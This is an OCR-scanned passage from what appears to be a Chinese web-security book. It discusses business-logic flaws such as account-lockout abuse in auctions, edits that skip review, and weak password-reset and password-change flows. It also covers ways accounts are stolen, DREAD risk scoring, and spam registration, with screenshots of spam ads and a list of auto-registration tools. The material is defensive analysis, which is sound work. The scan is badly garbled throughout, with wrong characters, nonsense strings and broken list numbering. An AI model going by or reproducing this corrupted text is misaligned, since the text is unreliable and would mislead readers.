写 的 个 人 资料 ， 如 果 发 现 用 户 使 用 了 诸如 : 用 户 名 、 邮 件 地 址 、 生 
日 、 电 话 号 码 之 类 的 个 人 信息 作为 密码 ， 则 应 当 立 即 进行 提示 。 
解决 好 了 这 两 个 问题 ， 也 就 解决 了 用 户 密码 可 能 被 猜 解 的 威胁 。 而 这 
样 的 一 套 安全 方案 ， 对 于 用 户 基本 上 是 透明 的 ， 没 有 侵入 性 ， 也 没有 
改变 用 户 的 使 用 习惯 。 这 样 的 方案 ， 把 安全 需要 付出 的 成 本 转移 到 网 
站 。 而 设 定 “ 用 户 不 能 使 用 个 人 信息 作为 密码 ”的 策略 后 ， 对 用 户 也 是 
一 种 引导 ， 在 注册 的 环节 教育 用 户 如 何 形成 良好 的 安全 习惯 。 

但 问题 并 未 至 此 结束 。 这 套 方案 的 前 提 是 密码 认证 所 面临 的 威胁 只 
有 “暴力 破解 ?和 “密码 中 包含 个 人 信息 ”。 如 果 出 现 了 新 的 未 考虑 到 的 
威胁 ， 还 是 有 可 能 让 用 户 处 于 危险 之 中 。 
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iis ° TE“ 我 的 安全 世界 观 ” 一 章 中 ， 介 绍 了 安全 评估 的 基本 过 程 ， 

中 “威胁 分 析 ? 是 设计 安全 方案 的 基础 + 设计 一 个 真正 优秀 的 安全 。 
案 ， 对 安全 工程 师 提 出 了 很 高 的 要 求 。 

安全 是 产品 的 一 种 特性 ， 如 有 果 我 们 的 产品 能 够 潜移默化 地 培 状 用 户 的 
人 那么 这 样 的 安全 束 古 最 理 


16.2 ”业务 逻辑 安全 

16.2.1 永远 改 不 掉 的 密码 

2007 年 ， 笔 者 过 到 了 一 起 离奇 的 攻击 事件 。 

公司 网 站 的 某 个 用 户 账户 发 现 被 人 盗用， 攻击 者 使 用 该 账户 来 发 广 
告 。 客 服 介 入 后 ， 帮 助 用 户 修 改 了 密码 、 安 全 问题 ， 并 注销 了 登 好 状 
。 但 这 并 没有 使 事情 有 所 好 转 ， 攻 击 者 仍然 能 够 登录 进 用 户 的 账 


公司 网 站 的 账户 体系 和 公司 的 IM (即时 通讯 软件 ) 账户 体系 是 互通 
的 ， 但 IM 限 制 同 时 只 能 有 一 个 账户 在 线 。 于 古 就 出现 了 一 个 很 神奇 的 
WA: 客服 登录 进 该 用 户 的 IM 账 户 后 ， 攻 击 者 又 紧 跟 着 登录 ， 还 会 把 
客服 登录 的 账户 踢 下 线 ; 客服 又 继续 登录 ， 把 攻击 者 踢 下 线 ， 如 此 反 
Fe 


后 来 笔者 追查 这 个 问题 时 发 现 ， 问 题 出 在 IM 的 目 有 账户 体系 中 。IM 有 

两 套 账 户 体 系 ， 一 套 是 网 站 的 用 户 账户 ， 另 一 父 是 IM 目 己 的 。 这 两 套 

账户 有 一 一 对 应 的 “ 绑 定 ”关系 。 

一 般 来 说 ， 网 站 的 用 户 修改 密码 后 ， 会 同步 修改 IM 的 账户 密码 。 但 是 

这 个 案例 里 ， 网 站 修改 密码 的 逻辑 里 ， 并 没有 同步 修改 对 应 的 IM 账 

户 ， 于 是 出 现 了 这 样 的 一 个 逻辑 漏洞 : 不 管 网 站 的 用 户 密码 如 何 更 

ze 攻击 者 总 是 能 够 通过 对 应 的 IM 账 户 登 录 〈 因 为 之 前 账户 已 经 被 盗 

这 就 是 一 个 典型 的 业务 逻辑 安全 问题 。 业 务 逻 辑 问 题 与 业务 的 关系 很 

紧密 ， 花 样 百 出 ， 很 难 总 结 归 类 。 

业务 逻辑 问题 是 一 种 设计 缺陷 ， 在 产品 开发 过 程 中 ， 可 以 考虑 在 产品 

设计 和 测试 阶段 解决 。 但 业务 逻辑 问题 没有 一 个 成 熟 的 归纳 体系 ， 很 

多 时 候 ， 只 能 依靠 安全 工程 师 的 个 人 经 验 来 判断 这 些 问 题 。 

我 们 再 看 两 个 案例 。 

16.2.2 ” 谁 是 大 赢家 

在 2007 年 的 Blackhat 大 会 上 ， 来 自 Whitehat 公 司 的 Jeremiah Grossman € 

Oar ieee nae 其 中 提 到 了 几 个 很 有 意思 的 案 
| 

某 家 在 线 购物 网 站 为 了 对 抗 密码 又 力 破 解 ， 规 定 短 时 间 内 账户 登录 失 

败 5 次 ， 职 将 锁定 账户 一 个 小 时 。 该 网 站 的 业务 中 ， 提 供 了 一 个 在 线 竞 

拍 的 功能 ， 用 户 可 以 给 喜欢 的 商品 出 价 ， 后 来 者 必须 给 出 一 个 更 高 的 

价格 。 在 拍卖 时 间 截 止 后， 商品 将 为 出 价 高 者 所 得 。 


这 其 中 存在 什么 问题 呢 ? 也 许 你 已 经 猜 到 了 ， 某 黑客 在 给 商品 出 价 
后 ， 在 网 站 上 继续 观察 谁 出 了 一 个 更 高 的 价格 ， 当 他 发 现 有 人 出 价 更 
高 时 ， 就 去 恶意 登录 这 个 用 户 的 账户 : 当 登 录 失 败 次 数 达 到 5 次 时 ， 该 
账户 就 被 系统 锁定 了 。 

订单 系统 和 账户 安全 系统 是 相关 联 的 ， 当 订单 系统 发 现 账 户 被 锁定 
后 ， 该 用 户 的 出 价 也 同时 作废 。 这 样 ， 黑 客 就 能 以 极 低 的 价格 ， 获 取 
他 所 想 竞 拍 的 物品 。 

Grossman 给 出 的 解决 建议 是 在 登录 错误 返回 时 ， 先 添加 一 个 登录 用 的 
验证 码 ， 以 避免 脚本 或 扫描 絮 的 上 自动 登录 ; 同时 在 网 站 页 面 上 隐藏 每 
个 用 户 的 ID， 只 显示 nick。 

在 这 个 案例 中 ， 其 实 还 存在 另外 一 个 逻辑 问题 。 网 站 如 果 将 用 户 的 ID 
显示 在 网 页 上 上， 那么 就 有 可 能 被 墨客 抓 取 ， 黑 客 可 以 实施 一 种 恶意 攻 
击 ， 使 用 一 个 脚本 不 停 地 党 试 登录 所 有 的 ID。 

这 样 ， 正 常 的 用 户 都 会 被 系统 山 定 。 如 果 大 多 数 的 用 户 都 无 法 正常 登 
录 网 站 ， 那 么 网 站 的 业务 会 受到 非常 大 的 影响 。 这 种 攻击 针对 的 是 安 
全 三 要 素 中 的 “可 用 性 ”。 很 多 网 站 在 设计 对 抗暴 力 破解 的 方案 时 ， 都 
会 使 用 “锁定 账户 ”的 策略 ， 其 实 都 会 存在 这 样 的 逻辑 缺陷 。 

如 何 解 决 这 个 问题 呢 ? 这 得 回 到 暴力 破解 的 对 抗 上 来 。 在 Jeremiah 
Grossman 提 出 的 解决 方案 中 ， 提 到 了 检测 到 暴力 破解 后 ， 增 加 一 个 验 
证 码 的 方案 。 我 们 知道 ， 验 证 码 并 非 一 种 好 的 用 户 体 验 ， 所 以 应 该 尽 
量 不 要 在 用 户 第 一 次 登录 时 就 增加 验证 码 。 

首先 ， 需 要 检测 到 暴力 破解 的 行为 。 

暴力 破解 通常 都 有 一 定 的 特征 ， 比 如 某 个 账户 在 5 分 钟 内 登录 错误 达到 
10 次 。 还 有 一 种 暴力 破解 攻击 是 根据 弱 口 令 来 届 历 用 户 名 的 ， 比 如 墨 
客 使 用 密码 “123456”， 党 试 登录 不 同 的 用 户 名 。 这 需要 黑客 事先 收集 
一 份 可 以 使 用 的 ID 列表 。 

但 无 论 如 何 变 化 ， 桑 力 破解 是 需要 高 效率 的 ， 所 以 “ 短 时 间 ”`\“ 高 频 
率 ” 的 行为 特征 比较 明显 。 墨 客 为 了 躲避 安全 系统 的 检测 ， 和 常 溃 会 使 用 
多 个 了 地 址 来 进行 登录 尝试。 这 些 IP 地 址 可 能 是 代理 服务 器 ， 也 可 能 
XE ATL o 

但 经 过 实践 检验 ， 即 使 黑客 使 用 了 多 个 IP 地 址 ， 想 要 使 攻击 达到 一 定 
的 规模 ， 还 是 会 使 用 重复 的 IP 地 址 。 最 终 的 结果 就 是 单个 IP 地 址 可 能 
会 发 起 多 次 网 络 请 求 。 

在 设计 对 抗 的 方案 时 ， 为 了 避免 本 案例 中 出 现 的 逻辑 漏洞， 就 不 应 该 
再 锁定 账户 ， 而 是 应 该 锁定 来 自 某 一 IP 地 址 的 请 求 。 并 且 当 认定 某 一 


IP 地 址 存在 恶意 行为 后 ， 对 卫 地 址 的 历史 记录 追加 处 加 。 这 样 就 不 会 
阻碍 正常 用 户 的 访问 ， 而 仅仅 把 坏人 关 在 门 外 。 

要 实现 这 样 的 一 套 系 统 顾 为 复杂 ， 同 时 还 要 兼顾 性 能 和 高 效 。 但 实现 
之 后 确实 是 行 之 有 效 的 。 

16.2.3 ”瞒天过海 

下 面 看 看 Jeremiah Grossman 举 出 的 另 一 个 经 典 案例 。 

在 北 加 州 ， 某 电视 台 的 网 站 为 了 Web 2.0 化 ， 开 发 了 一 个 新 的 功能 : tt 
许 网 友 们 提供 当地 的 天 气 信 息 ， 该 信息 将 在 电视 新 闻 中 深 动 播 出 。 为 
了 防止 垃圾 信息 ， 网 友 们 提供 的 信息 是 经 过 人 工 审 核 后 才 播 出 的 。 
但 是 这 套 系 统 在 设计 时 还 允许 网 友 们 对 信息 进行 编辑 。 此 处 存在 一 个 
还 辑 漏洞 : 审核 通过 后 的 信息 ， 如 果 被 用 户 重 新 编辑 了 ， 不 会 再 次 进 
行 审 核 ， 也 会 直接 发 送 到 电视 新 闻 的 滚动 条 中 。 于 是 有 不 少 人 利用 这 


一 逻辑 漏洞 ， 在 电视 狐 闻 中 发 送 各 种 垃圾 信息 。 
cm | 


电视 台 的 滚动 信息 被 黑客 自 改 

解决 这 个 不 大 不 小 的 麻烦 也 很 简单 ， 在 信息 编辑 前 加 入 人 工 审核 ， 但 
缺点 是 需要 耗费 更 多 的 人 力 。 

16.2.4 ”关于 密码 取 回 流程 

很 多 网 站 曾经 提供 的 “修改 密码 ”功能 中 ， 也 存在 一 个 典型 的 逻辑 问 
题 : 用 户 修改 密码 时 不 需要 提供 当前 密码 。 

这 种 设计 ， 导 臻 账户 被 次 后， 黑客 就 可 以 直接 使 用 此 功能 修改 账户 的 
密码 。 账 户 被 资 的 原因 有 很 多 种 ， 比 如 Cookie 动 持 导致 的 账户 被 盗 ， 
墨客 是 不 知道 用 户 密码 的 。 因 此 修改 密码 时 不 询问 当前 密码 ， 是 一 个 
逻辑 漏洞 。 

正确 的 做 法 是 ， 在 进行 敏感 操作 之 前 再 次 认证 用 户 的 身份 。 


"mu 


网 站 的 修改 用 户 密 码 页 面 

除了 “修改 密码 ?功能 外 ， 密 码 取 回 流程 也 是 一 个 很 复杂 、 很 容易 出 现 
逻辑 问题 的 地 方 。 

用 户 密 码 丢 失 后 ， 束 不 能 再 使 用 用 户 密码 作为 认证 手段 。 通 常 ， 如 末 
不 考虑 客服 的 话 ， 用 户 想 目 助 取 回 密码 ， 有 三 个 方法 可 以 用 来 认证 用 
Pu 一 是 用 户 设 定 的 安全 问题 ， 比 如 “妈妈 的 生日 是 什么 时 候 ”， 
答 :“ 生 我 的 那天 ”; 二 是 用 户 注 册 时 留 下 的 安全 邮箱 ， 可 以 通过 邮箱 
修改 密码 ， 二 是 给 用 户 改 送 手 机 短信 验证 色 ， 这 需要 用 户 预 留 手 机 信 
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问题 。 

这 三 种 认证 用 户 喘 份 的 信息 ， 是 否 可 能 个 黑客 修改 呢 ? 比 如 在 修改 安 
全 问题 前 ， 如 果 没 有 要 求 认证 当前 安全 问题 的 管 案 ， 则 黑客 可 以 直接 
修改 安全 问题 ; 再 比如 修改 用 户 手 机 号 码 ， 有 是 否 会 将 短信 发 送 到 当前 
手机 上 进行 身份 验证 ? 

但 是 出 于 可 用 性 的 考虑 ， 不 能 只 给 用 户 一 种 选择 。 比 如 : 用 户 的 手机 
号 人 码 如 果 作 废 了 ， 不 能 强求 用 户 在 修改 手机 号 码 时 ， 还 要 验证 一 下 已 
经 作废 的 手机 号 的 。 这 有 征 不 合理 的 ， 必 须 给 出 其 他 的 解决 途径 。 

当 三 种 认证 信息 都 不 太 可 靠 时 ， 只 能 选择 一 些 其 他 的 办 法 来 解决 。 一 
个 比较 好 的 方法 ， 是 使 用 用 户 在 网 站 上 留 下 过 的 一 些 私 有 信息 ， 与 用 
户 逐 一 核对 ， 以 验证 用 户 吴 份 确 实 是 本 人 。 

比如 : 用 户 曾经 使 用 过 的 密码 ; 用户 曾 经 登录 过 的 时 间 、 地 点 ; RH)" 
曾经 在 站 内 发 表 过 ， 但 又 删除 了 的 文章 等 。 这 些 信 息 可 以 称 为 用 户 
的 “基因 ”， 因 为 这 些 信息 越 详 细 ， 残 越 能 准确 地 区 分 出 一 个 独立 的 用 
尸 。“ 密 码 取 回流 程 ” 古 安全 设计 中 的 一 个 难题 ， 它 与 业务 结合 紧密 ， 
牵 一 发 而 动 全 身 。 目 前 没有 非常 标准 的 解决 方案 ， 只 能 具体 问题 具体 


分 析 。 


16.3 ”账户 是 如 何 被 盗 的 

账户 的 安全 问题 ， 是 互联 网 业务 安全 的 一 个 关键 问题 。 大 多 数 网 站 面 
| 临 的 业务 安全 类 投诉 ， 都 与 账户 被 盗 有 关 。 

2007 年 ，《 南 方 日 报 》 报 道 过 这 样 一 个 案例 : 12 月 14 日 早上 ， 广 州 某 
国际 旅行 社 吴 小 姐 上 QQ 时 突然 发 现 * 您 的 QQ 账户 在 另 一 地 点 登录 ， 您 
已 被 迫 下 线 ” 的 提示 。 吴 小 姐 再 次 上 线 后 ， 很 快 又 再 次 出 现 这 一 情况 。 
吴 小 姐 正 感到 纳闷 时 ， 却 收 到 几 名 QQ 好 友 的 电话 , “他 们 说 在 QQ 上 收 
到 我 经 济 有 困难 ， 请 汇款 给 我 帮忙 。 的 信息 ”。 吴 小 姐 方 知 自己 的 QQ 
号 已 被 人 盗 取 利用 。“ 我 这 个 被 资 的 QQ 很 重要 ， 里 面 很 多 朋友 都 有 工 
作 关 系 ， 特 别 是 QQ 里 面 的 群 组 织 。 他 老 在 RQ 上 乱 说 话 ， 对 我 影响 很 
大 。” 吴 小 姐 心 急 如 焚 。 随 后 ， 吴 小 姐 申 请 了 另 一 个 QQ 号 ， 通 过 原 QQ 
号 与 盗号 者 联系 。“ 不 料 对 方 竟 然 狮子 大 开口 ， 要 我 汇款 300 元 才 还 我 
QQ 号 ， 不 然 就 逐个 把 好 友 删 除 ， 现 在 已 删 了 一 部 分 。” 吴 小 姐 信念 不 
平地 说 ， 资 号 者 当时 24 小 时 在 线 ， 使 她 根本 无 法 上 线 ， 欲 更 改 密码 ， 
但 又 没有 申请 密码 保护 。 无 奈 之 下 ， 吴 小 姐 给 盗号 者 汇款 300 元 ， 和 希望 
盗号 者 能 兑现 “诺言 ”。 

盗号 问题 ， 已 经 成 为 影响 用 户 体 验 、 影 响 网 站 业务 正常 发 展 的 一 个 重 
要 问题 。 大 多 数 网 站 的 业务 安全 ， 主 要 是 在 与 盗号 做 斗争 。 网 络 游 戏 
行业 ， 因 为 有 利 可 图 ， 虚 拟 货币 、 游 戏 装备 的 变现 能 力 吸 引 了 大 量 黑 
客 ， 因 此 网 游 成 为 盗号 的 重 灾 区 。 同 样 盗号 问题 严重 的 ， 还 有 网 上 银 
行 以 及 网 上 支付 相关 的 行业 。 

16.3.1 ”账户 被 盗 的 途径 

账户 会 面临 哪些 威胁 呢 ? 通过 一 轮 头 脑 风 暴发 现 ， 在 以 下 几 种 情况 
下 ， 用 户 的 账户 存在 被 盗 的 可 能 。 


(1) 网 站 登录 过 程 中 无 HTTPS， 密 码 在 网 络 中 被 嗅 探 。 

(2) 用 户 电 脑 中 了 木马 ， 密 码 被 键盘 记录 软件 所 获取 。 

(3) 用 户 被 钓鱼 网 站 所 迷惑 ， 密 码 被 钓鱼 网 站 所 骗取 。 

(4) 网 站 某 登 录入 口 可 以 被 暴力 破解 。 

(5) 网 站 密码 取 回 流程 存在 逻辑 漏洞 。 

(6) 网 站 存在 XSS 等 客户 端 脚本 漏洞 ， 用 户 账 户 被 间接 窃取 。 

Rt Hn nucon EINE ， 网 站 被 黑客 入 侵 导 致 用 户 账 
H EE o 


以 上 这 些 威胁 中 ， 除 了 “用 户 电脑 中 了 木马 ?与 "用户 上 了 钓鱼 网 站 ”这 
两 点 与 用 户 目 身 有 天外， 其 余 几 点 都 是 可 以 从 服务 需 端 进行 控制 的 。 


22 如 果 这 几 点 没有 做 好 而 导致 的 安全 问题 ， 网 站 都 应 该 负 主 
进一步 进行 风险 分 析 ， 根 据 DREAD 模 型 (参见 “我 的 安全 世界 观 ” 一 
章 ) ， 可 以 得 出 如 下 的 风险 判断 。 (按照 风险 从 高 到 低 排 列 ) 

) 网 站 被 暴力 破解 D(3)+R(3)+E(3)+A(3)+D(3) = 15 

) 密码 取 回 流程 存在 逻辑 漏洞 D(3)+R(3)+E(3)+A(3)+D(2) = 14 

) 密码 被 嗅 探 D(3)+R(3)+E(3)+A(1)+D(3)= 13 

) 网 站 存在 SQL 注 入 漏洞 D(3)+R(3)+E(2)+A(3)+D(1) = 12 

) 用 户 被 钓鱼 D(3)+R(1)+E(3)+A(2)+D(3)= 12 

) 网 站 存在 XSS， 账 户 被 间接 窃取 D(3)+R(2)+E(2)+A(2)+D(2) = 11 

) 用 户 中 木马 D(3)+R(1)+E(2)+A(1)+D(1)=8 

尽管 风险 的 判断 存在 一 定 的 主观 因素 ， 但 DREAD 模 型 还 是 能 帮助 我 们 
更 清楚 地 认识 到 目前 的 问题 所 在 。 对 这 7 个 风险 进行 比较 ， 可 以 得 出 安 
全 工作 的 优先 级 。 从 以 上 分 析 可 以 看 出 : 

用 户 登 录 时 安全 > 网 站 实现 上 的 安全 漏洞 > 用 户 

使 用 环境 安全 

这 与 今天 的 现状 是 基本 一 致 的 。 

由 于 门槛 低 ， 见 效 快 ， 所 以 “暴力 破解 ?长 期 以 来 一 直 存 在 。 

一 家 叫 “RockYou” 的 SNS 网 站 遭受 攻击 后 ， 有 3200 万 用 户 密码 被 公布 在 
网 上 ， 黑 客 们 可 以 毫 不 费力 地 下 载 这 些 密码 。 

安全 研究 员 舒 尔 曼 和 他 的 公司 对 这 3200 万 被 资 密码 进行 了 研究 ， 发 现 
了 网 络 用 户 设置 密码 的 习惯 。 他 们 发 现 ，3200 万 用 户 中 将 近 1% 的 人 
以 “123456” 作 为 密码 ;使 用 第 二 多 的 密码 是 *12345”;， 排名 前 20 位 的 密 
码 还 A “qwerty” ( # 7X dg jJ SE ox BJ JL t CE 
Bk) ^ “abc123”4ll“princess” = ° 

舒 尔 曼 表示 ， 更 令 人 不 安 的 是 ， 在 3200 万 账户 中 ， 大 约 五 分 之 一 用 户 
所 使 用 的 密码 来 源 于 相当 接近 的 5000 个 符号 。 这 意味 着 ， 只 需要 尝试 
人 们 常用 的 密码 ， 黑 客 就 可 以 进入 很 多 账户 。 由 于 电脑 和 网 络 运行 速 
度 的 加 快 ， 黑 客 每 分 钟 就 可 以 进行 几 千 个 密码 破解 。 

舒 尔 曼 说 :“ 我 们 以 为 密码 破解 是 个 非常 耗 时 间 的 攻击 方式 ， 你 必须 对 
每 个 账户 都 逐个 字符 地 试 ， 每 破译 一 个 密码 都 需要 尝试 大 量 的 字符 。 
但 实际 情况 是 ， 只 要 选择 人 们 最 常用 的 几 个 字符 ， 就 能 破译 大 量 的 密 
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骏 力 破解 的 防范 也 远 远 不 如 想象 的 简单 ， 在 上 一 节 中 ， 谈 到 过 这 个 问 
题 。“ 网 络 嗅 探 > 本 来 是 一 个 很 产 重 的 安全 问题 。 但 是 在 今天 ， 大 家 都 
开始 重视 “ARP 其 给”， 在 许多 IDC 机 房 里 都 实施 了 对 抗 ARP 其 狂 的 方 
案 ， 比 如 采用 带 有 DAI 功 能 的 思科 交换 机 ， 或 者 静态 绑 定 卫 地 址 与 
MAC。 所 以 今天 想 在 网 站 服务 器 所 在 的 VLAN 实 施 ARP 其 骗 是 比较 困 
难 的 。 今 天 的 ARP 其 编 ， 更 多 的 是 在 威胁 个 人 用 户 。 因 此 在 DREAD 模 
型 的 评分 中 , «PZ MRR” AJ“ Affected Users” 一 项 只 评 了 1 分 。 

尚未 列 出 来 的 威胁 还 有 很 多 ， 需 要 在 工作 中 不 断 完善 。 比 如 网 站 所 使 
用 的 Web Server 出 现 漏洞 ， 导 致 被 远程 攻击 。 

此 外 ， 还 曾经 发 生 过 这 样 的 案例 : 某 大 型 社区 被 墨客 入 侵 ， 泄 露 了 数 
据 库 中 的 全 部 用 户 数 据 。 如 果 网 站 将 用 户 的 密码 明文 保存 在 数据 库 
中 ， 或 者 没有 加 Salt 的 哈 希 值 ， 则 黑客 可 以 根据 这 些 密码 ， 再 次 尝试 
入 侵 同 一 用 户 的 邮箱 、IM 等 第 三 方 网 站 账户 。 因 为 大 部 分 用 户 都 习惯 
于 使 用 同一 个 密码 登录 不 同 的 网 站 。 

16.3.2 “分析 账户 被 盗 的 原因 

盗号 的 可 能 性 有 这 么 多 ， 那 么 如 何 分 析 和 定位 问题 所 在 呢 ? 

首先 ， 客 服 是 最 重要 和 直接 的 渠道 。 

从 客服 收集 第 一 手 资 料 ， 甚 至 由 工程 师 回访 客户 ， 会 有 意 想 不 到 的 收 
获 。 客 户 往 往 讲 不 清楚 问题 的 关键 ， 所 以 需要 事先 考虑 好 各 种 可 能 
性 ， 并 有 针对 性 地 辐 客 户 提 一 些 问 题 。 有 时 候 访 问 个 别 客户 也 许 无 法 
得 到 所 需 结果 ， 此 时 应 该 耐心 等 每 并 收集 更 多 证 据 。 

但 在 工作 中 ， 经 常 容易 犯 的 错误 是 主观 腾 断 。 我 们 可 以 事先 考虑 到 各 
种 可 能 性 ， 但 是 一 定 要 做 到 “大 胆 假设 ， 小 心 求 证 *。 求 证 的 过 程 必须 
一 丝 不 丙 ， 务 必 保 证 严谨 。 如 果 没 搞 清 楚 事 实 的 真相 到 撒 是 什么 ， 而 
只 是 靠 猜 测 来 设计 解决 方案 的 话 ， 则 很 容易 找 错 目 标 ， 从 而 浪费 非常 
宝贵 的 时 间 ， 间 题 也 很 可 能 因此 而 扩大 化 。 

其 次 ， 从 日 志 中 寻找 证 据 。 

除了 从 客户 处 收集 第 一 手 资 料 外 ， 也 应 该 重视 网 站 日 志 的 作用 ， 从 日 
志 中 去 大 胆 求证 。 

比如 其 力 破 解 ， 很 有 可 能 会 在 登录 日 志 中 留 下 大 量 错 误 登 录 的 记 孙 ， 
如 果 找 到 了 ， 则 求证 成 功 。 稍 微 复杂 点 的 ， 如 果 是 “密码 取 回 流程 ”之 
类 的 逻辑 漏洞 ， 则 被 盗用 户 可 能 有 这 样 的 特征 : 异地 登录 后 实施 更 改 
密码 一 类 的 操作 ， 甚 至 有 个 别 “ 高 危 地 区 IP” 登 录 多 个 不 相关 账户 的 行 
为 。 这 些 都 古 能 够 从 日 志 里 找到 的 证 据 。 

最 后 ， 打 入 敌人 内 部 ， 探 听 最 新 动态 。 


在 黑色 产业 链 中 ， 有 人 制作 、 销 售 工具 ， 也 有 人 专门 从 事 诈骗 活动 。 
这 些 人 建立 的 群体 ， 关 系 并 不 是 非常 紧密 的 ， 可 能 仅仅 是 依靠 QQ 和 群 或 
其 他 IM 互 相 联 系 。 因 此 打 入 这 些 人 所 在 的 圈子 ， 并 不 是 特别 困难 的 事 
情 ， 这 样 能 掌握 敌人 的 第 一 手 资 料 。 黑 客 们 也 有 目 己 的 群体 ， 在 社区 
里 打听 ， 也 能 得 到 一 些 有 用 的 消息 。 


16.4 互联 网 的 垃圾 

在 上 一 节 ， 探 讨 了 盗号 的 问题 。 但 很 多 时 候 ， 恶 意 用 户 并 不 需要 盗 
号 ， 也 能 完成 他 们 的 目的 。 在 本 方 ， 将 探讨 二 圾 注册 和 垃圾 信息 ， 这 
是 另 一 个 让 网 站 无 比 头 疼 的 问题 。 

16.4.1 ”垃圾 的 危害 

今天 的 互联 网 中 垃圾 信息 泛滥 ， 但 互联 网 对 垃圾 信息 的 重视 程度 却 远 
。 在 网 站 应 用 中 ， 垃 圾 注册 几乎 成 为 一 切 业 务 安 全 问题 的 源 


通过 一 些 调研 结 采 发 现 ， 世 圾 注册 问题 积弊 已 入 。 一 个 大 型 网 站 平均 
每 天 的 新 增 注册 用 户 中 ， 可 能 有 超过 一 半 是 垃圾 注册 造成 的 。 

这 么 多 的 注册 账户 ， 都 干什么 去 了 ? 这 些 垃圾 账户 的 目的 有 很 多 ， 有 
的 是 为 了 发 广告 ， 有 的 是 为 了 宜 传 政治 观点 ， 有 的 古 为 了 诈骗 其 他 用 
户 ， 不 一 而 同 。 

那 怎么 认定 一 个 账户 是 垃圾 账户 呢 ? 一 般 来 说 ,“ 目 的 不 是 网 站 所 提供 
的 服务 ”的 注册 账户 ， 痢 属于 垃圾 账户 。 

比如 一 个 论坛 提供 一 些 内 部 资源 供 会 员 购 买 《比如 付费 的 正版 电 
影 ) ， 但 是 购买 的 形式 是 会 员 每 次 购买 都 需要 支付 相应 的 “虚拟 金 
币 ”。“ 庶 拟 金币 ”的 获得 有 儿 种 途径 : 会员 在 论坛 里 发 帖 ， 可 以 获得 一 
定 的 金币 ; 或 者 会 员 通 过 网 银 充值 ， 能 够 兄 换 到 金币 ， 还 有 就 是 论坛 
为 了 发 励 新 注册 会 员 ， 会 给 每 个 新 注 册 账 户 赠送 10 个 金币 。 

这 给 了 恶意 用 户 可 乘 之 机 : 利用 “新 注 册 用 户 奖励 10 个 金币 ”的 机 制 ， 
恶意 用 户 通过 批量 注册 的 手段 ， 一 夜 之 间 注 册 了 几 千 个 账户 ， 并 在 站 
内 将 金币 都 园 到 一 个 账户 上 ， 最 终 在 论坛 里 消费 挥 这 些 金 币 。 

这 样 产 生 的 几 千 个 账户 ， 就 变 成 了 “垃圾 账户 *”。 而 论坛 本 来 能 收 到 的 
费用 ， 则 在 无 形 中 损失 了 。 网 站 将 为 此 天 单 。 

这 个 案例 ， 束 古 一 个 通过 垃圾 注册 利用 逻辑 漏洞 的 典型 案例 。 

垃圾 注册 的 账户 ， 和 党 第 用 来 发 广告 和 推广 信息 。 任 何 可 以 “留言 ”以 及 
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aes 

L| NoaQaQaOaQAQAF 
水 金龙 铁艺 模型 考 卖 店 执 忱 为 您 服务 
sity.cn 
EE: 2j sys 
00:996643178 tel: 15510685873 
[2011.05.23 18:08:42] 


欢迎 光临 水 金龙 铁艺 模型 专卖 店 
N DD — eooeee 
ee 
E 

g 10101014014047 
水 金龙 铁艺 模型 考 卖 店 热忱 汶 您 服务 
sity.cn 
旺旺 : aj ss 
00:995643178 tel: 15510685873 
[2011.05.20 23:08:46] 
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T] NoaQOaCjaDaQaQAF 
水 金龙 铁艺 模型 考 卖 店 热忱 汶 您 服务 
sjty.cn 
旺旺 : zj sys 
00:996643178 tel: 15510685873 
[2011.05.20 11:52:55] 


淘宝 网 的 商品 评价 中 的 垃圾 信息 
百度 可 以 搜索 到 很 多 目 动 注册 机 ， 在 网 上 可 以 随意 下 载 。 


评价 人 


ER : cindyyeying 


GGGG 


ER : joanjoanlo 


ER : Aihm 
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宝贝 信息 


水 金龙 模型 1975 年 美国 发 纪 阿 由 奇 武 装 直 知 机 -给 力 


3 


6185, 


水 金龙 模型 世界 上 第 一 辆 汽车 1886 痉 弛 1 号 - 纯 手工 /， 
418 元 


水 金龙 模型 1945 年 大 众 甲 过 由 -咖啡 复古 版 - 纯 手 工人 ， 
1887, 


软件 名 称 软件 大 小 来 源 


邮箱 自动 注册 机 3.50.10 1.12M 天 空 软件 站 
邮箱 自动 注册 机 v3.5.10 2.06 M 非凡 软件 站 
share168YY 自 动 批量 注册 机 v1.0.0 2.9 M 非凡 软件 站 
强 仁 新 浪 邮 箱 自动 注册 机 , v2.30 2.79M 非凡 软件 站 
强 仁 网 易 邮 箱 自动 注册 机 , v2.01 2.54M 非凡 软件 站 


soft.baidu.com/softwaresearch/s?tn-software&r... 2011-5-25 


9 条 回复 date 2008 年 1 月 28 日 

论坛 注册 王 使 用 教程 基本 操作 步骤 如 下 【其 他 类 型 论坛 同 理应 用 ) : 第 一 步 、 在 IE 窗口 打开 
您 需要 注册 的 论坛 ， 并 找到 论坛 的 注册 页 网 址 ! 并 确保 注册 页 如 保留 "用 户 名 、 窗 

www. discuz.net/forum.php?mod=viewthread&a ... 2011-5-13 - 百度 快照 


信人 久久 人 银 四 词 论坛 自动 发 贴 机 + 注册 机 , TEHSRE. eeeeruisiizBueM xL 
v.kuB.com/show/B--GILSTUjBRJAer.html 2011-5-6 - 百度 快照 


邮箱 自动 注册 机 怎么 样 ?邮箱 自动 注册 机 好 用 吗 ?7OL 中 关 村 在 线 软 件 下 载 频 道 为 您 提供 专业 
点 评 为 您 了 解 邮箱 自动 注册 机 1. 96. .33 提供 最 专业 的 参考 。 


-—— -= —— eh 


搜索 到 的 自动 注册 机 结 


16.4.» ”垃圾 处 理 

ha eee 垃圾 处 理 离 不 开 两 个 步骤 : “GR 
» eee 9:65 

拦截 的 万 法 根据 业务 而 害 。 可 以 选择 冻结 账户 或 者 删除 账户 ， 也 可 以 
只 针对 垃圾 内 容 做 屏蔽 。 但 问题 的 关键 是 屏蔽 什么 、 拦 截 什 么 ， 这 就 

涉及 到 “垃圾 识 ! 别 技术 ”了 。 

想 要 拦截 垃圾 注册 和 垃圾 消息 ， 就 要 先 了 解 它们 。 垃 圾 注册 的 一 个 特 

点 是 “批量 ”>， 由 程序 自动 完成 。 垃 圾 消息 的 传播 也 如 此 ， 很 少 有 垃圾 

消息 是 手动 一 条 条 发 出 来 的 。 但 是 当 有 极 大 利益 驱动 时 ， 垃 圾 注册 也 

可 能 会 变 成 一 种 半自动 或 者 手动 的 方式 。 笔 者 曾经 见 过 一 些 批量 注册 

账户 的 程序 一 一 由 于 网 站 在 注册 时 要 求 输入 验证 码 ， 而 验证 码 难 以 破 

解 ， 骗 子 雇佣 了 一 批 人 ， 在 网 吧 里 每 天 的 工作 就 是 手动 输入 验证 码 。 


